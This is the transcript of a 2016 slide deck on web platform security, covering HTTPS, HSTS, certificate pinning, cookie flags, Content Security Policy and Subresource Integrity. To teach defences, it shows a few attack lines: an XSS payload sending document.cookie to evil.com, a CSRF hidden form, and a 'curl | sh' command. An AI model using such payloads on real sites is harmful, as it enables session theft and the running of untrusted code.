Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Platform Security
Search
Jérémy Courtial
October 26, 2016
Programming
0
43
Web Platform Security
Jérémy Courtial
October 26, 2016
Tweet
Share
More Decks by Jérémy Courtial
See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
23
An introduction to AppSec?
mrartichaut
0
36
Secure by design: introduction to threat modeling
mrartichaut
0
39
Taming secrets with Vault
mrartichaut
0
73
Lead Tech: Empowering the team
mrartichaut
0
43
go doSomeThing()
mrartichaut
0
49
Practical Cryptography : Data Encryption
mrartichaut
0
55
Practical Cryptography : Password Hashing
mrartichaut
1
65
HTTP/2 : One connection to rule them all
mrartichaut
1
55
Other Decks in Programming
See All in Programming
敵対的ポイフル
futabato
0
120
Elm Form Validation
bkuhlmann
0
510
Azure OpenAI Serviceのプロンプトエンジニアリング入門
tomokusaba
3
860
初心者のためのRubyKaigi入門/RubyKaigi Introduction
a_matsuda
8
1.3k
Tailwind CSSを本気でカスタマイズする方法
fsubal
14
5.4k
Fragment Composition of GraphQL
quramy
13
1.4k
大規模UIKitベースアプリへのTCAの段階的導入/gradual-adoption-of-tca-in-a-large-scale-uikit-based-app
takehilo
2
200
Fast JSX: Don't clone props object #28768
yossydev
1
160
Kotlin Multiplatform at Stable and Beyond (Android Makers 2024)
zsmb
0
430
TCAとKMPを用いた新規動画配信アプリ 「ABEMA Live」の設計
tomu28
2
120
Milestoner
bkuhlmann
1
410
"config" ってなんだ? / What is "config"?
okashoi
0
250
Featured
See All Featured
Debugging Ruby Performance
tmm1
70
11k
Imperfection Machines: The Place of Print at Facebook
scottboms
261
12k
The Power of CSS Pseudo Elements
geoffreycrofte
61
5k
Happy Clients
brianwarren
92
6.4k
Code Reviewing Like a Champion
maltzj
515
39k
GraphQLの誤解/rethinking-graphql
sonatard
55
9.3k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
323
20k
Designing Experiences People Love
moore
136
23k
What the flash - Photography Introduction
edds
64
11k
10 Git Anti Patterns You Should be Aware of
lemiorhan
649
58k
Being A Developer After 40
akosma
66
580k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
117
18k
Transcript
Web Platform Security Leveling up Jérémy Courtial Software Security Architect
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin.
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Rootkit ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Malware ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Trojan ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Browser /ˈbraʊ.zɚ/
http://yolo.com Go!
curl -s http://yolo.com | sh VS http://yolo.com Go!
Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from unknown origin.
Unknown origin
Unknown origin Unsecure
What is anyway ? www.google.com
What is anyway ? www.oodrive.com
What is anyway ? www.lol-cats.com
What is anyway ? 172.217.20.46
Unsecure origin
Unsecure origin
Transport Layer Security
Confidentiality Integrity Authentication
Other incentives "The green lock™"
Other incentives HTTP/2
Other incentives "Secure origins only" features
http https
GET /
GET / 302 Found Location: https://yolo.com
GET / 302 Found Location: https://yolo.com
None
None
302 Found
302 Found
302 Found
HTTP Strict Transport Security
Strict-Transport-Security :
max-age=31536000; Strict-Transport-Security :
includeSubdomains; max-age=31536000; Strict-Transport-Security :
http://yolo.com
http://yolo.com 307 Internal Redirect
https://yolo.com 307 Internal Redirect
307 Internal Redirect GET / https://yolo.com
Trust failure
TLS certificates are based on trust
Oh… trust … That's cute …
Trust-based systems don't have a good reliability record …
Certificate Authority failures Bad captive portal Every "Internal CA"
You've failed me for the last time
HTTP Certificate Pinning
Public-Key-Pins:
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.
Unknown code
XSS <h1>Hello, ${username}</h1>
XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"
XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>
CSRF https://evil.com Click here!
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
Everybody love cookies !
Rename Cookie to Spinach ?
Rename Cookie to Spinach ? Brussel Sprout ?
REJECTED
Locking the cookie jar
Set-Cookie : JSESSIONID=12345;
Set-Cookie : JSESSIONID=12345; secure;
Set-Cookie : JSESSIONID=12345; secure; HttpOnly;
Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;
Content Security Policy
Content-Security-Policy
: default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src
… ; connect-src …; Content-Security-Policy
: … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy
Our data (cookies, assets) are locked. What about third parties
?
HTML JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
Subresource Integrity
<script src="https://example.com/framework.js" > </script>
<script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser unknown code
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser trusted code
Many more Suborigins iframe sandboxing Credentials Management
https://www.w3.org/2011/webappsec/ @mikewest
Times have changed
Times have changed "secured" is the new default secured
What does secured means ? secured Least Privilege Authentication Integrity
Is our platform ? secured
Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,
unlimicon (The Noun Project) and design.google.com/icons/